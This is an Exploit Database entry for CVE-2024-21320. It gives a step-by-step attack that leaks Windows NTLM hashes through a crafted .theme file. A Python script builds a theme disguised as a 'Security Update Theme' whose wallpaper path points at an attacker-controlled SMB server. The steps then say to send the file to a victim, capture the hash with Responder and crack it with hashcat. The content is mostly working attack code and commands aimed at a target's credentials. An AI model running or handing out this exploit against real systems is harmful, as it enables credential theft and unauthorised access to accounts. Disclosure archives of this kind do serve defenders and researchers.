Microsoft Windows – NTLM Hash Leak Malicious Windows Theme

• Exploit Database
• 7 阅读

• 作者： Abinesh kamal K U
  日期： 2025-03-22
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/52092/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75

  # Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme # Date: 02/03/2025 # Exploit Author: Abinesh Kamal K U # CVE : CVE-2024-21320 # Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320     ## Step 1: Install Responder Responder is a tool to capture NTLM hashes over SMB.   git clone https://github.com/lgandx/Responder.git cd Responder   Replace `eth0` with your network interface.     ## Step 2: Create a Malicious Windows Theme File   ### Python Script to Generate the Malicious `.theme` File   import os   # Attacker-controlled SMB server IP attacker_smb_server = "192.168.1.100"# Change this to your attacker's IP   # Name of the malicious theme file theme_filename = "malicious.theme"   # Malicious .theme file content theme_content = f""" [Theme] DisplayName=Security Update Theme   [Control Panel\Desktop] Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg   [VisualStyles] Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles ColorStyle=NormalColor Size=NormalSize """   # Write the theme file with open(theme_filename, "w") as theme_file: theme_file.write(theme_content)   print(f"[+] Malicious theme file '{theme_filename}' created.")   # Optional: Start a Python HTTP server to serve the malicious theme file start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower() if start_http == "y": print("[+] Starting HTTP server on port 8080...") os.system("python3 -m http.server 8080") ```     ## Step 3: Deliver & Capture NTLM Hashes 1. Send the `malicious.theme` file to the target. 2. Run Responder to capture the NTLM hash:   sudo python3 Responder.py -I eth0   3. Wait for the victim to open the `.theme` file. 4. Extract NTLM hash from Responder logs and crack it using hashcat:   hashcat -m 5600 captured_hashes.txt rockyou.txt     -- Abinesh Kamal K U abineshjerry.info MTech - Cyber Security Systems & Networks Amrita University